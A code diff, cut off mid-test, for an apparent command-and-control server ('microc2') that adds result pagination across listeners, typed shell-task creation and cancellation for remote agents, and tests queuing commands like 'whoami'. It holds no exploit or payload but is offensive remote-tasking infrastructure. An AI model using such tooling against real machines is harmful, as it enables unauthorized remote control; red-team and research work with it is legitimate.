+	options taskListOptions,
+) (legacyResultPage, bool, error) {
+	knownAgent := false
+	total := 0
+	remainingOffset := options.offset
+	remainingLimit := options.limit
+	candidates := make([]map[string]interface{}, 0, options.limit)
+	maxInt := int(^uint(0) >> 1)
+
+	for _, ref := range h.agentTaskProtocolRefs(agentID) {
+		if ref.knownAgent {
+			knownAgent = true
 		}
+
+		localOffset := 0
+		fetchLimit := 0
+		if remainingLimit > 0 {
+			localOffset = remainingOffset
+			fetchLimit = remainingLimit
+		}
+		results, listenerTotal := ref.protocol.GetResultsPage(
+			agentID,
+			localOffset,
+			fetchLimit,
+		)
+		if listenerTotal < 0 || listenerTotal > maxInt-total {
+			return legacyResultPage{}, knownAgent, errors.New(
+				"listener returned an invalid result count",
+			)
+		}
+		total += listenerTotal
+		if listenerTotal > 0 {
+			knownAgent = true
+		}
+
+		if remainingOffset >= listenerTotal {
+			if len(results) != 0 {
+				return legacyResultPage{}, knownAgent, errors.New(
+					"listener returned results beyond its reported count",
+				)
+			}
+			remainingOffset -= listenerTotal
+			continue
+		}
+
+		available := listenerTotal - localOffset
+		expected := fetchLimit
+		if expected > available {
+			expected = available
+		}
+		if len(results) != expected {
+			return legacyResultPage{}, knownAgent, fmt.Errorf(
+				"listener returned %d results, expected %d",
+				len(results),
+				expected,
+			)
+		}
+		candidates = append(candidates, results...)
+		remainingOffset = 0
+		remainingLimit -= len(results)
 	}
-	http.Error(w, "Agent or results not found", http.StatusNotFound)
+
+	body, count, err := encodeLegacyResultArray(
+		candidates,
+		maxLegacyResultsPageBodyBytes,
+	)
+	if err != nil {
+		return legacyResultPage{}, knownAgent, err
+	}
+
+	end := options.offset
+	if count > maxInt-end {
+		return legacyResultPage{}, knownAgent, errors.New(
+			"result continuation offset overflowed",
+		)
+	}
+	end += count
+	var nextOffset *int
+	if end < total {
+		next := end
+		nextOffset = &next
+	}
+	return legacyResultPage{
+		body:       body,
+		count:      count,
+		total:      total,
+		nextOffset: nextOffset,
+	}, knownAgent, nil
+}
+
+func encodeLegacyResultArray(
+	results []map[string]interface{},
+	maxBytes int,
+) ([]byte, int, error) {
+	if maxBytes < len("[]\n") {
+		return nil, 0, errors.New("legacy result body budget is too small")
+	}
+
+	encodedResults := make([][]byte, 0, len(results))
+	encodedSize := len("[]\n")
+	for _, result := range results {
+		encoded, err := json.Marshal(result)
+		if err != nil {
+			return nil, 0, fmt.Errorf("encode legacy result: %w", err)
+		}
+		separatorSize := 0
+		if len(encodedResults) > 0 {
+			separatorSize = 1
+		}
+		if len(encoded) > maxBytes-encodedSize-separatorSize {
+			if len(encodedResults) == 0 {
+				return nil, 0, errors.New(
+					"one legacy result exceeds the response body budget",
+				)
+			}
+			break
+		}
+		encodedResults = append(encodedResults, encoded)
+		encodedSize += separatorSize + len(encoded)
+	}
+
+	body := make([]byte, 0, encodedSize)
+	body = append(body, '[')
+	for index, encoded := range encodedResults {
+		if index > 0 {
+			body = append(body, ',')
+		}
+		body = append(body, encoded...)
+	}
+	body = append(body, ']', '\n')
+	return body, len(encodedResults), nil
+}
+
+func writeResultQueryError(w http.ResponseWriter, err error) {
+	http.Error(w, "Invalid result query: "+err.Error(), http.StatusBadRequest)
+}
+
+func decodeStrictJSON(
+	w http.ResponseWriter,
+	r *http.Request,
+	destination interface{},
+	maxBytes int64,
+) error {
+	r.Body = http.MaxBytesReader(w, r.Body, maxBytes)
+	decoder := json.NewDecoder(r.Body)
+	decoder.DisallowUnknownFields()
+	if err := decoder.Decode(destination); err != nil {
+		return err
+	}
+	var trailing interface{}
+	if err := decoder.Decode(&trailing); !errors.Is(err, io.EOF) {
+		if err == nil {
+			return errors.New("request body must contain exactly one JSON value")
+		}
+		return err
+	}
+	return nil
+}
+
+func writeJSONDecodeError(w http.ResponseWriter, message string, err error) {
+	var maxBytesError *http.MaxBytesError
+	if errors.As(err, &maxBytesError) {
+		http.Error(w, message+": request body too large", http.StatusRequestEntityTooLarge)
+		return
+	}
+	http.Error(w, message+": "+err.Error(), http.StatusBadRequest)
+}
+
+func writeAgentResolutionError(w http.ResponseWriter, err error) {
+	switch {
+	case errors.Is(err, errAgentNotFound):
+		http.Error(w, err.Error(), http.StatusNotFound)
+	case errors.Is(err, errAgentInactive),
+		errors.Is(err, errAmbiguousAgentOwnership),
+		errors.Is(err, errAmbiguousTaskOwnership):
+		http.Error(w, err.Error(), http.StatusConflict)
+	default:
+		http.Error(w, "Agent task routing failed", http.StatusInternalServerError)
+	}
+}
+
+func writeTaskError(w http.ResponseWriter, err error) {
+	switch {
+	case tasks.IsValidationError(err):
+		http.Error(w, err.Error(), http.StatusBadRequest)
+	case errors.Is(err, tasks.ErrNotFound):
+		http.Error(w, err.Error(), http.StatusNotFound)
+	case errors.Is(err, tasks.ErrInvalidTransition):
+		http.Error(w, err.Error(), http.StatusConflict)
+	case errors.Is(err, tasks.ErrCapacity):
+		http.Error(w, err.Error(), http.StatusTooManyRequests)
+	default:
+		http.Error(w, "Task operation failed", http.StatusInternalServerError)
+	}
+}
+
+func writeJSON(w http.ResponseWriter, status int, value interface{}) {
+	w.Header().Set("Content-Type", "application/json")
+	w.WriteHeader(status)
+	if err := json.NewEncoder(w).Encode(value); err != nil {
+		log.Printf("[ERROR] Failed to encode API response: %v", err)
+	}
 }

--- a/server/internal/handlers/api/api_handler.go
+++ b/server/internal/handlers/api/api_handler.go
@@ -596,7 +596,7 @@ func (h *APIHandler) handleGetAgentResults(
 	}
 	page, knownAgent, err := h.legacyResultPage(agentID, options)
 	if err != nil {
-		log.Printf("[ERROR] Failed to page legacy results for agent %s: %v", agentID, err)
+		log.Print("[ERROR] Failed to page legacy results")
 		http.Error(w, "Result pagination failed", http.StatusInternalServerError)
 		return
 	}
@@ -615,7 +615,7 @@ func (h *APIHandler) handleGetAgentResults(
 	w.Header().Set("Content-Type", "application/json")
 	w.WriteHeader(http.StatusOK)
 	if _, err := w.Write(page.body); err != nil {
-		log.Printf("[ERROR] Failed to write legacy results response: %v", err)
+		log.Print("[ERROR] Failed to write legacy results response")
 	}
 }
 

--- a/server/internal/handlers/api/api_handler_test.go
+++ b/server/internal/handlers/api/api_handler_test.go
@@ -4,14 +4,23 @@ import (
 	"bytes"
 	"encoding/hex"
 	"encoding/json"
+	"errors"
+	"fmt"
+	"io"
 	"microc2/server/internal/behaviour"
+	"microc2/server/internal/common"
 	"microc2/server/internal/listeners"
+	"microc2/server/internal/tasks"
 	"microc2/server/pkg/communication"
 	"net/http"
 	"net/http/httptest"
 	"os"
 	"path/filepath"
+	"sort"
+	"strconv"
+	"strings"
 	"testing"
+	"time"
 )
 
 func TestOperatorAPIDoesNotServeAgentPollingRoutes(t *testing.T) {
@@ -61,6 +70,7 @@ func TestOperatorAPIQueuesCommandsAndReturnsResults(t *testing.T) {
 	if rec.Code != http.StatusOK {
 		t.Fatalf("expected results route 200, got %d: %s", rec.Code, rec.Body.String())
 	}
+	assertLegacyResultPageHeaders(t, rec, 50, 0, 1, 1, "")
 	var results []map[string]interface{}
 	if err := json.Unmarshal(rec.Body.Bytes(), &results); err != nil {
 		t.Fatalf("decode results: %v", err)
@@ -70,6 +80,847 @@ func TestOperatorAPIQueuesCommandsAndReturnsResults(t *testing.T) {
 	}
 	if results[0]["command"] != "pwd" || results[0]["output"] != "ok\n" {
 		t.Fatalf("unexpected result payload: %#v", results[0])
+	}
+	taskHistory, err := proto.ListTasks("agent-one")
+	if err != nil {
+		t.Fatalf("list typed task history for legacy adapter: %v", err)
+	}
+	if len(taskHistory) != 2 ||
+		taskHistory[0].Status != tasks.StatusDispatched ||
+		taskHistory[1].Status != tasks.StatusCompleted {
+		t.Fatalf("legacy command adapter did not use typed task lifecycle: %#v", taskHistory)
+	}
+}
+
+func TestOperatorAPITypedTaskCreateListAndCancel(t *testing.T) {
+	handler, _ := newTestAPIHandler(t, "agent-one")
+
+	rec := httptest.NewRecorder()
+	req := jsonRequest(t, http.MethodPost, "/api/agents/agent-one/tasks", map[string]interface{}{
+		"schema_version":     1,
+		"type":               "shell",
+		"arguments":          map[string]string{"command": "whoami"},
+		"timeout_seconds":    30,
+		"expires_in_seconds": 120,
+	})
+	handler.HandleRequest(rec, req)
+	if rec.Code != http.StatusAccepted {
+		t.Fatalf("expected typed task create 202, got %d: %s", rec.Code, rec.Body.String())
+	}
+	var created tasks.Task
+	if err := json.Unmarshal(rec.Body.Bytes(), &created); err != nil {
+		t.Fatalf("decode created task: %v", err)
+	}
+	if created.SchemaVersion != 1 || created.AgentID != "agent-one" ||
+		created.Status != tasks.StatusQueued || created.ExpiresAt == nil {
+		t.Fatalf("unexpected created task: %#v", created)
+	}
+	if delta := created.ExpiresAt.Sub(created.CreatedAt); delta != 120*time.Second {
+		t.Fatalf("expiry delta = %s, want 2m", delta)
+	}
+
+	rec = httptest.NewRecorder()
+	req = httptest.NewRequest(http.MethodGet, "/api/agents/agent-one/tasks", nil)
+	handler.HandleRequest(rec, req)
+	if rec.Code != http.StatusOK {
+		t.Fatalf("expected typed task list 200, got %d: %s", rec.Code, rec.Body.String())
+	}
+	var listed taskListEnvelope
+	if err := json.Unmarshal(rec.Body.Bytes(), &listed); err != nil {
+		t.Fatalf("decode task list: %v", err)
+	}
+	if listed.SchemaVersion != tasks.SchemaVersion ||
+		listed.Limit != defaultTaskListLimit ||
+		listed.Offset != 0 ||
+		listed.Total != 1 ||
+		listed.NextOffset != nil ||
+		len(listed.Tasks) != 1 ||
+		listed.Tasks[0].ID != created.ID {
+		t.Fatalf("unexpected task list: %#v", listed)
+	}
+
+	rec = httptest.NewRecorder()
+	req = httptest.NewRequest(
+		http.MethodPost,
+		"/api/agents/agent-one/tasks/"+created.ID+"/cancel",
+		nil,
+	)
+	handler.HandleRequest(rec, req)
+	if rec.Code != http.StatusOK {
+		t.Fatalf("expected cancellation 200, got %d: %s", rec.Code, rec.Body.String())
+	}
+	var cancelled tasks.Task
+	if err := json.Unmarshal(rec.Body.Bytes(), &cancelled); err != nil {
+		t.Fatalf("decode cancelled task: %v", err)
+	}
+	if cancelled.Status != tasks.StatusCancelled || cancelled.CompletedAt == nil {
+		t.Fatalf("unexpected cancelled task: %#v", cancelled)
+	}
+}
+
+func TestOperatorAPITaskListPaginationIsBoundedAndNewestFirst(t *testing.T) {
+	handler, proto := newTestAPIHandler(t, "agent-one")
+	expiresIn := 300
+	created := make([]tasks.Task, 0, 105)
+	for i := 0; i < 105; i++ {
+		task, err := proto.CreateTask("agent-one", tasks.CreateRequest{
+			SchemaVersion:    tasks.SchemaVersion,
+			Type:             tasks.TypeShell,
+			Arguments:        tasks.ShellArguments{Command: fmt.Sprintf("command-%03d", i)},
+			TimeoutSeconds:   30,
+			ExpiresInSeconds: &expiresIn,
+		})
+		if err != nil {
+			t.Fatalf("create task %d: %v", i, err)
+		}
+		created = append(created, task)
+	}
+	expected := append([]tasks.Task(nil), created...)
+	sort.Slice(expected, func(i, j int) bool {
+		if expected[i].CreatedAt.Equal(expected[j].CreatedAt) {
+			return expected[i].ID > expected[j].ID
+		}
+		return expected[i].CreatedAt.After(expected[j].CreatedAt)
+	})
+
+	defaultPage := getTaskList(t, handler, "/api/agents/agent-one/tasks")
+	if defaultPage.SchemaVersion != tasks.SchemaVersion ||
+		defaultPage.Limit != defaultTaskListLimit ||
+		defaultPage.Offset != 0 ||
+		defaultPage.Total != len(created) ||
+		defaultPage.NextOffset == nil ||
+		*defaultPage.NextOffset != defaultTaskListLimit ||
+		len(defaultPage.Tasks) != defaultTaskListLimit {
+		t.Fatalf("unexpected default page: %#v", defaultPage)
+	}
+	assertTaskSummariesNewestFirst(t, defaultPage.Tasks)
+	if defaultPage.Tasks[0].ID != expected[0].ID {
+		t.Fatalf(
+			"default page starts with task %q, want newest %q",
+			defaultPage.Tasks[0].ID,
+			expected[0].ID,
+		)
+	}
+
+	maxPage := getTaskList(t, handler, "/api/agents/agent-one/tasks?limit=100")
+	if maxPage.Limit != maxTaskListLimit ||
+		maxPage.Offset != 0 ||
+		maxPage.Total != len(created) ||
+		maxPage.NextOffset == nil ||
+		*maxPage.NextOffset != maxTaskListLimit ||
+		len(maxPage.Tasks) != maxTaskListLimit {
+		t.Fatalf("unexpected maximum page: %#v", maxPage)
+	}
+	assertTaskSummariesNewestFirst(t, maxPage.Tasks)
+
+	finalPage := getTaskList(
+		t,
+		handler,
+		"/api/agents/agent-one/tasks?limit=100&offset=100",
+	)
+	if finalPage.Limit != maxTaskListLimit ||
+		finalPage.Offset != maxTaskListLimit ||
+		finalPage.Total != len(created) ||
+		finalPage.NextOffset != nil ||
+		len(finalPage.Tasks) != 5 {
+		t.Fatalf("unexpected final page: %#v", finalPage)
+	}
+	assertTaskSummariesNewestFirst(t, finalPage.Tasks)
+	if finalPage.Tasks[0].ID != expected[100].ID ||
+		finalPage.Tasks[len(finalPage.Tasks)-1].ID != expected[104].ID {
+		t.Fatalf("pagination omitted or reordered tail tasks: %#v", finalPage.Tasks)
+	}
+
+	emptyPage := getTaskList(
+		t,
+		handler,
+		"/api/agents/agent-one/tasks?limit=10&offset=1000",
+	)
+	if emptyPage.Total != len(created) ||
+		emptyPage.Offset != 1000 ||
+		emptyPage.NextOffset != nil ||
+		len(emptyPage.Tasks) != 0 {
+		t.Fatalf("unexpected beyond-end page: %#v", emptyPage)
+	}
+}
+
+func TestOperatorAPITaskListRejectsInvalidQueries(t *testing.T) {
+	handler, _ := newTestAPIHandler(t, "agent-one")
+	tests := []string{
+		"?limit=0",
+		"?limit=101",
+		"?limit=-1",
+		"?limit=one",
+		"?limit=",
+		"?offset=-1",
+		"?offset=one",
+		"?offset=",
+		"?offset=999999999999999999999999999999999999",
+		"?limit=1&limit=2",
+		"?offset=1&offset=2",
+		"?unknown=1",
+		"?limit=1;offset=2",
+	}
+	for _, query := range tests {
+		t.Run(query, func(t *testing.T) {
+			rec := httptest.NewRecorder()
+			req := httptest.NewRequest(
+				http.MethodGet,
+				"/api/agents/agent-one/tasks"+query,
+				nil,
+			)
+			handler.HandleRequest(rec, req)
+			if rec.Code != http.StatusBadRequest {
+				t.Fatalf("query %q: expected 400, got %d: %s", query, rec.Code, rec.Body.String())
+			}
+		})
+	}
+}
+
+func TestOperatorAPITaskListOmitsOutputAndDetailReturnsCanonicalTask(t *testing.T) {
+	handler, proto := newTestAPIHandler(t, "agent-one")
+	expiresIn := 300
+	task, err := proto.CreateTask("agent-one", tasks.CreateRequest{
+		SchemaVersion:    tasks.SchemaVersion,
+		Type:             tasks.TypeShell,
+		Arguments:        tasks.ShellArguments{Command: "collect-output"},
+		TimeoutSeconds:   30,
+		ExpiresInSeconds: &expiresIn,
+	})
+	if err != nil {
+		t.Fatalf("create task: %v", err)
+	}
+	completeTypedTask(t, proto, task, "stdout-sentinel", "stderr-sentinel")
+
+	rec := httptest.NewRecorder()
+	req := httptest.NewRequest(http.MethodGet, "/api/agents/agent-one/tasks", nil)
+	handler.HandleRequest(rec, req)
+	if rec.Code != http.StatusOK {
+		t.Fatalf("list task history: %d: %s", rec.Code, rec.Body.String())
+	}
+	if bytes.Contains(rec.Body.Bytes(), []byte(`"output"`)) ||
+		bytes.Contains(rec.Body.Bytes(), []byte("stdout-sentinel")) ||
+		bytes.Contains(rec.Body.Bytes(), []byte("stderr-sentinel")) {
+		t.Fatalf("task list leaked result streams: %s", rec.Body.String())
+	}
+	var page taskListEnvelope
+	if err := json.Unmarshal(rec.Body.Bytes(), &page); err != nil {
+		t.Fatalf("decode task list: %v", err)
+	}
+	if len(page.Tasks) != 1 ||
+		page.Tasks[0].Result == nil ||
+		page.Tasks[0].Result.TaskID != task.ID ||
+		page.Tasks[0].Result.Outcome != tasks.OutcomeCompleted {
+		t.Fatalf("task list omitted result summary: %#v", page)
+	}
+
+	rec = httptest.NewRecorder()
+	req = httptest.NewRequest(
+		http.MethodGet,
+		"/api/agents/agent-one/tasks/"+task.ID,
+		nil,
+	)
+	handler.HandleRequest(rec, req)
+	if rec.Code != http.StatusOK {
+		t.Fatalf("get task detail: %d: %s", rec.Code, rec.Body.String())
+	}
+	var detail tasks.Task
+	if err := json.Unmarshal(rec.Body.Bytes(), &detail); err != nil {
+		t.Fatalf("decode task detail: %v", err)
+	}
+	if detail.ID != task.ID ||
+		detail.Result == nil ||
+		detail.Result.Output.Stdout != "stdout-sentinel" ||
+		detail.Result.Output.Stderr != "stderr-sentinel" {
+		t.Fatalf("detail did not return canonical output: %#v", detail)
+	}
+}
+
+func TestOperatorAPITypedTaskValidationAndTransitions(t *testing.T) {
+	handler, proto := newTestAPIHandler(t, "agent-one")
+
+	invalidBodies := []map[string]interface{}{
+		{
+			"schema_version":     2,
+			"type":               "shell",
+			"arguments":          map[string]string{"command": "whoami"},
+			"timeout_seconds":    30,
+			"expires_in_seconds": 300,
+		},
+		{
+			"schema_version":     1,
+			"type":               "file",
+			"arguments":          map[string]string{"command": "whoami"},
+			"timeout_seconds":    30,
+			"expires_in_seconds": 300,
+		},
+		{
+			"schema_version":     1,
+			"type":               "shell",
+			"arguments":          map[string]string{"command": ""},
+			"timeout_seconds":    30,
+			"expires_in_seconds": 300,
+		},
+		{
+			"schema_version":     1,
+			"type":               "shell",
+			"arguments":          map[string]string{"command": "whoami"},
+			"timeout_seconds":    3601,
+			"expires_in_seconds": 300,
+		},
+		{
+			"schema_version":     1,
+			"type":               "shell",
+			"arguments":          map[string]string{"command": "whoami"},
+			"timeout_seconds":    30,
+			"expires_in_seconds": 604801,
+		},
+		{
+			"schema_version":     1,
+			"type":               "shell",
+			"arguments":          map[string]string{"command": "whoami"},
+			"timeout_seconds":    30,
+			"expires_in_seconds": 300,
+			"unknown":            true,
+		},
+		{
+			"type":               "shell",
+			"arguments":          map[string]string{"command": "whoami"},
+			"timeout_seconds":    30,
+			"expires_in_seconds": 300,
+		},
+		{
+			"schema_version":  1,
+			"type":            "shell",
+			"arguments":       map[string]string{"command": "whoami"},
+			"timeout_seconds": 30,
+		},
+	}
+	for i, body := range invalidBodies {
+		rec := httptest.NewRecorder()
+		req := jsonRequest(t, http.MethodPost, "/api/agents/agent-one/tasks", body)
+		handler.HandleRequest(rec, req)
+		if rec.Code != http.StatusBadRequest {
+			t.Fatalf("invalid body %d: expected 400, got %d: %s", i, rec.Code, rec.Body.String())
+		}
+	}
+
+	rec := httptest.NewRecorder()
+	req := jsonRequest(t, http.MethodPost, "/api/agents/agent-one/tasks", map[string]interface{}{
+		"schema_version":     1,
+		"type":               "shell",
+		"arguments":          map[string]string{"command": "whoami"},
+		"timeout_seconds":    30,
+		"expires_in_seconds": 300,
+	})
+	handler.HandleRequest(rec, req)
+	if rec.Code != http.StatusAccepted {
+		t.Fatalf("create task: expected 202, got %d: %s", rec.Code, rec.Body.String())
+	}
+	var created tasks.Task
+	if err := json.Unmarshal(rec.Body.Bytes(), &created); err != nil {
+		t.Fatalf("decode task: %v", err)
+	}
+	assertNextTypedTask(t, proto, "agent-one", created.ID)
+
+	rec = httptest.NewRecorder()
+	req = httptest.NewRequest(
+		http.MethodPost,
+		"/api/agents/agent-one/tasks/"+created.ID+"/cancel",
+		nil,
+	)
+	handler.HandleRequest(rec, req)
+	if rec.Code != http.StatusConflict {
+		t.Fatalf("dispatched cancellation: expected 409, got %d: %s", rec.Code, rec.Body.String())
+	}
+
+	rec = httptest.NewRecorder()
+	req = jsonRequest(t, http.MethodPost, "/api/agents/missing/tasks", map[string]interface{}{
+		"schema_version":     1,
+		"type":               "shell",
+		"arguments":          map[string]string{"command": "whoami"},
+		"timeout_seconds":    30,
+		"expires_in_seconds": 300,
+	})
+	handler.HandleRequest(rec, req)
+	if rec.Code != http.StatusNotFound {
+		t.Fatalf("unknown agent: expected 404, got %d: %s", rec.Code, rec.Body.String())
+	}
+}
+
+func TestOperatorAPITaskRoutingRejectsDuplicateActiveAgent(t *testing.T) {
+	handler, first := newTestAPIHandler(t, "agent-one")
+	second := addTestHTTPListener(
+		t,
+		handler,
+		"listener-two",
+		49002,
+		listeners.StatusActive,
+		"agent-one",
+	)
+
+	rec := httptest.NewRecorder()
+	req := jsonRequest(
+		t,
+		http.MethodPost,
+		"/api/agents/agent-one/tasks",
+		validTaskRequestBody("ambiguous"),
+	)
+	handler.HandleRequest(rec, req)
+	if rec.Code != http.StatusConflict {
+		t.Fatalf("duplicate active agent: expected 409, got %d: %s", rec.Code, rec.Body.String())
+	}
+
+	expiresIn := 300
+	firstTask, err := first.CreateTask("agent-one", tasks.CreateRequest{
+		SchemaVersion:    tasks.SchemaVersion,
+		Type:             tasks.TypeShell,
+		Arguments:        tasks.ShellArguments{Command: "first"},
+		TimeoutSeconds:   30,
+		ExpiresInSeconds: &expiresIn,
+	})
+	if err != nil {
+		t.Fatalf("create first listener task: %v", err)
+	}
+	secondTask, err := second.CreateTask("agent-one", tasks.CreateRequest{
+		SchemaVersion:    tasks.SchemaVersion,
+		Type:             tasks.TypeShell,
+		Arguments:        tasks.ShellArguments{Command: "second"},
+		TimeoutSeconds:   30,
+		ExpiresInSeconds: &expiresIn,
+	})
+	if err != nil {
+		t.Fatalf("create second listener task: %v", err)
+	}
+
+	rec = httptest.NewRecorder()
+	req = httptest.NewRequest(http.MethodGet, "/api/agents/agent-one/tasks", nil)
+	handler.HandleRequest(rec, req)
+	if rec.Code != http.StatusOK {
+		t.Fatalf("list duplicate-listener history: %d: %s", rec.Code, rec.Body.String())
+	}
+	var history taskListEnvelope
+	if err := json.Unmarshal(rec.Body.Bytes(), &history); err != nil {
+		t.Fatalf("decode duplicate-listener history: %v", err)
+	}
+	if len(history.Tasks) != 2 || history.Total != 2 {
+		t.Fatalf("combined history has %d tasks, want 2: %#v", len(history.Tasks), history)
+	}
+
+	rec = httptest.NewRecorder()
+	req = httptest.NewRequest(
+		http.MethodPost,
+		"/api/agents/agent-one/tasks/"+firstTask.ID+"/cancel",
+		nil,
+	)
+	handler.HandleRequest(rec, req)
+	if rec.Code != http.StatusOK {
+		t.Fatalf("cancel uniquely owned task with duplicate active agent: %d: %s", rec.Code, rec.Body.String())
+	}
+	secondState, err := second.GetTask("agent-one", secondTask.ID)
+	if err != nil || secondState.Status != tasks.StatusQueued {
+		t.Fatalf("cancelling first task changed second listener task: %#v err=%v", secondState, err)
+	}
+}
+
+func TestOperatorAPITaskRoutingIgnoresStoppedDuplicateForCreation(t *testing.T) {
+	handler, active := newTestAPIHandler(t, "agent-one")
+	stopped := addTestHTTPListener(
+		t,
+		handler,
+		"listener-zero",
+		49002,
+		listeners.StatusStopped,
+		"agent-one",
+	)
+
+	rec := httptest.NewRecorder()
+	req := jsonRequest(
+		t,
+		http.MethodPost,
+		"/api/agents/agent-one/tasks",
+		validTaskRequestBody("active-only"),
+	)
+	handler.HandleRequest(rec, req)
+	if rec.Code != http.StatusAccepted {
+		t.Fatalf("active plus stopped duplicate: expected 202, got %d: %s", rec.Code, rec.Body.String())
+	}
+	activeHistory, err := active.ListTasks("agent-one")
+	if err != nil {
+		t.Fatalf("list active listener tasks: %v", err)
+	}
+	stoppedHistory, err := stopped.ListTasks("agent-one")
+	if err != nil {
+		t.Fatalf("list stopped listener tasks: %v", err)
+	}
+	if len(activeHistory) != 1 || len(stoppedHistory) != 0 {
+		t.Fatalf(
+			"task routed to wrong listener: active=%#v stopped=%#v",
+			activeHistory,
+			stoppedHistory,
+		)
+	}
+}
+
+func TestOperatorAPITaskHistoryIncludesStoppedListenerDetail(t *testing.T) {
+	handler, _ := newTestAPIHandler(t, "agent-one")
+	stopped := addTestHTTPListener(
+		t,
+		handler,
+		"listener-zero",
+		49002,
+		listeners.StatusStopped,
+		"agent-one",
+	)
+	expiresIn := 300
+	task, err := stopped.CreateTask("agent-one", tasks.CreateRequest{
+		SchemaVersion:    tasks.SchemaVersion,
+		Type:             tasks.TypeShell,
+		Arguments:        tasks.ShellArguments{Command: "stopped-history"},
+		TimeoutSeconds:   30,
+		ExpiresInSeconds: &expiresIn,
+	})
+	if err != nil {
+		t.Fatalf("create stopped-listener task: %v", err)
+	}
+	completeTypedTask(t, stopped, task, "stopped-stdout", "")
+
+	page := getTaskList(t, handler, "/api/agents/agent-one/tasks")
+	if page.Total != 1 ||
+		len(page.Tasks) != 1 ||
+		page.Tasks[0].ID != task.ID {
+		t.Fatalf("stopped-listener history missing from list: %#v", page)
+	}
+
+	rec := httptest.NewRecorder()
+	req := httptest.NewRequest(
+		http.MethodGet,
+		"/api/agents/agent-one/tasks/"+task.ID,
+		nil,
+	)
+	handler.HandleRequest(rec, req)
+	if rec.Code != http.StatusOK {
+		t.Fatalf("get stopped-listener detail: %d: %s", rec.Code, rec.Body.String())
+	}
+	var detail tasks.Task
+	if err := json.Unmarshal(rec.Body.Bytes(), &detail); err != nil {
+		t.Fatalf("decode stopped-listener detail: %v", err)
+	}
+	if detail.Result == nil || detail.Result.Output.Stdout != "stopped-stdout" {
+		t.Fatalf("stopped-listener detail lost canonical output: %#v", detail)
+	}
+}
+
+func TestOperatorAPITaskDetailRejectsAmbiguousOwnership(t *testing.T) {
+	handler, _ := newTestAPIHandler(t, "agent-one")
+	now := time.Now().UTC()
+	expiresAt := now.Add(time.Minute)
+	duplicate := tasks.Task{
+		SchemaVersion:  tasks.SchemaVersion,
+		ID:             "duplicate-task",
+		AgentID:        "agent-one",
+		Type:           tasks.TypeShell,
+		Arguments:      tasks.ShellArguments{Command: "ambiguous"},
+		TimeoutSeconds: 30,
+		Status:         tasks.StatusQueued,
+		CreatedAt:      now,
+		QueuedAt:       now,
+		ExpiresAt:      &expiresAt,
+	}
+	first := &staticTaskProtocol{
+		agentID:  "agent-one",
+		lastSeen: now,
+		tasks:    map[string]tasks.Task{duplicate.ID: duplicate},
+	}
+	listenersInManager := handler.serverManager.GetListenerManager().ListListeners()
+	if len(listenersInManager) != 1 {
+		t.Fatalf("initial listener count = %d, want 1", len(listenersInManager))
+	}
+	listenersInManager[0].Protocol = first
+
+	secondListener, err := listeners.NewListener(listeners.ListenerConfig{
+		ID:       "listener-two",
+		Name:     "listener-two",
+		Protocol: "http",
+		BindHost: "127.0.0.1",
+		Port:     49002,
+	})
+	if err != nil {
+		t.Fatalf("create second listener: %v", err)
+	}
+	secondListener.Protocol = &staticTaskProtocol{
+		agentID:  "agent-one",
+		lastSeen: now,
+		tasks:    map[string]tasks.Task{duplicate.ID: duplicate},
+	}
+	secondListener.Status = listeners.StatusStopped
+	if err := handler.serverManager.GetListenerManager().AddListener(secondListener); err != nil {
+		t.Fatalf("add second listener: %v", err)
+	}
+
+	rec := httptest.NewRecorder()
+	req := httptest.NewRequest(
+		http.MethodGet,
+		"/api/agents/agent-one/tasks/"+duplicate.ID,
+		nil,
+	)
+	handler.HandleRequest(rec, req)
+	if rec.Code != http.StatusConflict {
+		t.Fatalf("ambiguous detail: expected 409, got %d: %s", rec.Code, rec.Body.String())
+	}
+
+	rec = httptest.NewRecorder()
+	req = httptest.NewRequest(
+		http.MethodGet,
+		"/api/agents/agent-one/tasks/missing-task",
+		nil,
+	)
+	handler.HandleRequest(rec, req)
+	if rec.Code != http.StatusNotFound {
+		t.Fatalf("missing detail: expected 404, got %d: %s", rec.Code, rec.Body.String())
+	}
+}
+
+func TestOperatorAPILegacyResultsAggregateDeterministicallyAcrossListeners(t *testing.T) {
+	handler, primary := newTestAPIHandler(t, "agent-one")
+	stopped := addTestHTTPListener(
+		t,
+		handler,
+		"listener-zero",
+		49002,
+		listeners.StatusStopped,
+		"agent-one",
+	)
+
+	for i := 0; i < 3; i++ {
+		command := fmt.Sprintf("one-%d", i)
+		primary.QueueCommand("agent-one", command)
+		assertNextAgentCommand(t, primary, "agent-one", command)
+		postAgentResult(t, primary, "agent-one", command, xorHex(command+"\n", "agent-one"))
+	}
+	for i := 0; i < 3; i++ {
+		command := fmt.Sprintf("zero-%d", i)
+		stopped.QueueCommand("agent-one", command)
+		assertNextAgentCommand(t, stopped, "agent-one", command)
+		postAgentResult(t, stopped, "agent-one", command, xorHex(command+"\n", "agent-one"))
+	}
+
+	rec := httptest.NewRecorder()
+	req := httptest.NewRequest(
+		http.MethodGet,
+		"/api/agents/agent-one/results?limit=3&offset=2",
+		nil,
+	)
+	handler.HandleRequest(rec, req)
+	if rec.Code != http.StatusOK {
+		t.Fatalf("aggregate results: %d: %s", rec.Code, rec.Body.String())
+	}
+	assertLegacyResultPageHeaders(t, rec, 3, 2, 6, 3, "5")
+	var results []map[string]interface{}
+	if err := json.Unmarshal(rec.Body.Bytes(), &results); err != nil {
+		t.Fatalf("decode aggregate results: %v", err)
+	}
+	if len(results) != 3 ||
+		results[0]["command"] != "one-2" ||
+		results[1]["command"] != "zero-0" ||
+		results[2]["command"] != "zero-1" {
+		t.Fatalf("results are not ordered by listener ID: %#v", results)
+	}
+}
+
+func TestOperatorAPILegacyResultsPagingDefaultsAndStrictQueries(t *testing.T) {
+	handler, proto := newTestAPIHandler(t, "agent-one")
+	for i := 0; i < 105; i++ {
+		command := fmt.Sprintf("command-%03d", i)
+		proto.QueueCommand("agent-one", command)
+		assertNextAgentCommand(t, proto, "agent-one", command)
+		postAgentResult(t, proto, "agent-one", command, xorHex(command+"\n", "agent-one"))
+	}
+
+	rec := httptest.NewRecorder()
+	req := httptest.NewRequest(http.MethodGet, "/api/agents/agent-one/results", nil)
+	handler.HandleRequest(rec, req)
+	if rec.Code != http.StatusOK {
+		t.Fatalf("default legacy result page: %d: %s", rec.Code, rec.Body.String())
+	}
+	assertLegacyResultPageHeaders(t, rec, 50, 0, 105, 50, "50")
+	var firstPage []map[string]interface{}
+	if err := json.Unmarshal(rec.Body.Bytes(), &firstPage); err != nil {
+		t.Fatalf("decode default legacy result page: %v", err)
+	}
+	if len(firstPage) != 50 ||
+		firstPage[0]["command"] != "command-000" ||
